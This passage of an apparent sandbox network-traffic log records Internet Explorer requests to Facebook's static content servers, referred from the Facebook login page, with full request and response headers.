                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: 5HHrVWw8oRgkBBacKgsdCw==
                                                                                              X-FB-Debug: vdCThnip6zcTsvXy5p5bEFFSIMbAs7EVBTlVGxlYj3IUNW5iMruzU+Mr2IiOZZSQFLGyRhXZ6gSDGjDwr0arYA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1557
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/RNFuSb7tdaZ.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/y8/r/RNFuSb7tdaZ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Fri, 18 Oct 2024 19:34:39 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: qij8lHmYVDJxb3NmfHqnjg==
                                                                                              X-FB-Debug: Wg5EOWhkPMk9h1M1922zNbYBp9AfFoMOxLuceCa5r6avXRLca+rGMEA+HZLIsrnQuwcwem50ab3GjUzsOEN48w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 115563
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3i7M54/ya/l/en_US/kzikDtJjAjw.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3i7M54/ya/l/en_US/kzikDtJjAjw.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sun, 20 Oct 2024 04:00:21 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: FXgRup1n4eFh60qDbf+2IQ==
                                                                                              X-FB-Debug: V0u73lgWikDukGB1Ywn99VIKQcbQ2V2rfRVVEEIAI4dDoqNn3xSn1TfdZKQS68XW6QHX37CHmDsJ5HXydeqBwQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 15302
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              content-md5: hFRfTj3CmfIMC+ZxDLCYWA==
                                                                                              Expires: Thu, 10 Oct 2024 23:10:23 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              X-FB-Debug: oyYffFKveecdOT4D2YUDuNI9gByvojXXG1Xk97kK2xkypElZqGytAcGROSJ3DZ1wnpy05rMCOmQ/fAiDER65HA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 6739
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/x-icon
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              content-md5: jN3KQn2um5Jec0MvhzPgWg==
                                                                                              Expires: Thu, 17 Oct 2024 05:00:32 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              X-FB-Debug: 5vOc7xNjhix2N2mQoNxnw4tjUlRi7K0JyT7+fAdejLhBmMqdEBllQgLhAgUKdquVW8bAgY9dAJEuIKAVnnvd6w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 4286
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/1pSdZY9nD00.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yP/r/1pSdZY9nD00.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 18:04:57 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: y6DdjjyjVwiWo0b2Ijw/uQ==
                                                                                              X-FB-Debug: dNR5bzEmkteczGRzTFlsN8RkxBSvcpsjd/AspMvE7mus2Z1Houjf4+YoTfcslk9W8qrHTFSwqvuHJmGDQYr+ZQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 14897
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 05:04:25 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: dqvoBl8ro/+gGxnSjPisJA==
                                                                                              X-FB-Debug: 92rsDpoO+QJLCU1MQQ3FGJGXCc+QxKFvp6EoP116h5+pC4rUhZXiezdRZ2wOAqI3B7oozSS9HxDrOw4olzBnPQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 3232
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/sFUAis1ZaCC.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yp/r/sFUAis1ZaCC.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sat, 19 Oct 2024 06:54:51 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: TWVL1462ygV0MLx+RqU8aA==
                                                                                              X-FB-Debug: xqyw6XVxtqM5gIeGLa3IggciC42HcrFeV/rXts8AGnd6hliu12D3cwmFDl+WVp16fD61wKhXG/scTMu80fjqSg==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 5418
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sat, 12 Oct 2024 18:32:57 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: pl0JqNDekyZ6hCD9BIH9Dw==
                                                                                              X-FB-Debug: AcM4TmxzrFHqa6+LdxvuX32QWEaXI3+VpAiZa7pLQ4Z8Fb6htbLf4cWza2WyHx8CkEc0UT0/Z1V8dntOjGCwuw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 2164
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/iaGxcrtiWqg.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yS/l/0,cross/iaGxcrtiWqg.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 21:41:25 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: XfA+1iK7igp0PemOO8ZEgg==
                                                                                              X-FB-Debug: pAtzaSLm/TaWMVP0q+fLdOCgPllKyVTdvvy16a3AVdIzi/Xcoh0blH1GAzuCqfd1fhcd6sXtBJNNst6Hd1oTGA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 4976
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/BQn1Lzzcmjv.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yl/r/BQn1Lzzcmjv.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 10 Oct 2024 01:43:11 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: VPWIMrVkl4wuVM4u9St8sg==
                                                                                              X-FB-Debug: TN7muntMevsj14KtKxACbUzwOr2rNDsqKgUobYEftzcoGYWfYUnKVBpbsh6rxXEcMqyvGcgzYt4x9GRSUb9Wfg==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 6875
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              content-md5: OcEdZWIg79UvSWVADRSQCg==
                                                                                              Expires: Sat, 12 Oct 2024 22:45:30 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              X-FB-Debug: sGYiow5ZMHNSinkGkD4nVu6nwccDgdl6I5U0igZ1AuOkqUGnL9Q707LAWdrBL0DdyU1qaMYw3b6/zl7JPp0UTg==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 95
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Fri, 18 Oct 2024 00:08:12 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: WCUQJeRI9cPYgTinbDNMyA==
                                                                                              X-FB-Debug: H+P7BOWclKd2mtwNk3w8605j30eOjjvoJmhVM1cb/3tmbh55aE+ShrrMBFTEFXMQbWX9k0Mi/+XiH8H900Xqrw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 845
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 16:16:22 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: PCil07El4hl7RdWxcVlVHw==
                                                                                              X-FB-Debug: 0IsYR026y1o/eG4bfGs3vusXFApzXhhRBuG1H2T6SqfJYkm0kA13bOkeHH7RW69MNTujBweEvmL+NxhdYSN1GA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 333
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/8lNKnIFH3On.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/y3/r/8lNKnIFH3On.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 18:04:57 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: 6QCLzi2Ve2B6VFrQdM73eQ==
                                                                                              X-FB-Debug: s6GvR/MhENy9/lPKDvLU7uvQkoyOsB/Llb9FDT0BK6AMyO5bJsjyEk8fm7nQDlmKabS5PHzFt1gaIr/ttpmDyQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 5818
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3iF074/yG/l/en_US/bar7zWMDDHc.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
